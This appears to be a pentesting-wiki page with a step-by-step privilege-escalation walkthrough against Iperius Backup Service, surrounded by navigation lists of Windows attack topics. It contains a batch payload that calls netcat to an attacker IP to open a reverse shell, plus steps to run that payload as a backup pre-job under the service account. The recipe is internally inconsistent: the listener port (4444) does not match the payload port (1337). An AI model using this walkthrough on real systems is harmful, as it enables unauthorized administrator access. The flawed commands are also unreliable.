Active Directory

AD CS (Active Directory Certificate Services) Pentesting

AS-REP Roasting

Active Directory Pentesting

Constrained Delegation Attack

DACL (Discretionary Access Control List) Attack

Kerberoasting Attack

Kerberos Pentesting

LAPS (Local Administrator Password Solution) Pentesting

LDAP (Lightweight Directory Access Protocol) Pentesting

LDAP Injection

Netlogon Elavasion of Privilege

RBCD (Resource-Based Constrained Delegation) Attack

SMB (Server Message Block) Pentesting

Shadow Credentials

Protocol

MSRPC (Microsoft Remote Procedure Call) Pentesting

RDP (Remote Desktop Protocol) Pentesting

WinRM (Windows Remote Management) Pentesting

Service

Iperius Backup Service Privilege Escalation

M365 (Microsoft Office 365) Pentesting

ManageEngine ADSelfService Plus PrivEsc

Microsoft Outlook Message (.msg)

Microsoft Word Pentesting

Windows Print Spooler Service

Windows PrivEsc with Unquoted Service Path

Privilege Escalation

Activate Administrator Account on Windows

Add/Edit/Delete Users on Windows

Dumping Credentials from Windows Vault

Dumping Credentials with keymgr.dll

Dumping Windows Password Hashes

Iperius Backup Service Privilege Escalation

ManageEngine ADSelfService Plus PrivEsc

Mimikatz

Outlook Reminder Privilege Escalation

SPN-Jacking

Switch User on Windows

UAC Bypass

Windows PrivEsc with AD CS

Windows PrivEsc with DLL Hijacking

Windows PrivEsc with Kerberos

Windows PrivEsc with LocalPotato

Windows PrivEsc with Registry Keys

Windows PrivEsc with RemotePotato

Windows PrivEsc with SeBackupPrivilege

Windows PrivEsc with Unquoted Service Path

Windows Privilege Escalation

Iperius Backup Service Privilege Escalation

Last modified: 2023-02-08

Iperius Backup Service is a database backup software. It is vulnerable to privilege escalation in Windows.

Investigation

First check if Iperius is running in target machine.

wmic service list | findstr "Iperius"

If the Iperius service is running, we can gain access to administrator privilege.

Exploitation

1. Create a Payload

In target machine, create a .bat file named "exploit.bat".

@echo off
C:\Users\<USERNAME>\Downloads\nc.exe <attack_machine_ip> 1337 -e exploit.exe

Then place it to Desktop.
When saving, be sure to save it as the file type "All Files" (NOT .txt).

After that start a listener in local machine.

nc -lvnp 4444

2. Create a New Backup in Iperius**

Click "Iperius" icon in Windows Explorer (the common path is C:\Program Files (x86)\Iperius Backup\Iperius).
Right click the "Iperius" icon on the right-bottom of the bar to open it.
Click "Create New Backup" and select "Add Folder".
Enter path (c:\Users\<USERNAME>\Documents) and click "OK".
Navigate to "Destination" tab and select "Add Destination Folder".
Enter path (c:\Users\<USERNAME>\Descktop) and click "OK".
Navigate to "Other Processes" tab.
On "Before backup" section, check "Run a program or open external file:" and select "exploit.bat" file.

3. Run the Backup

After setting a new backup, we can run it.
On "Iperius Backup" window, right-click on backup jobs "Documents" and select "Run backup as service" then click "OK" on the dialog.

Now we should get a shell in local machine.

Active Directory

Protocol

Service

Privilege Escalation

Post Exploitation

Forensics

PowerShell

WSL

Technique

Iperius Backup Service Privilege Escalation

Investigation

Exploitation

1. Create a Payload

2. Create a New Backup in Iperius**

3. Run the Backup

ON THIS PAGE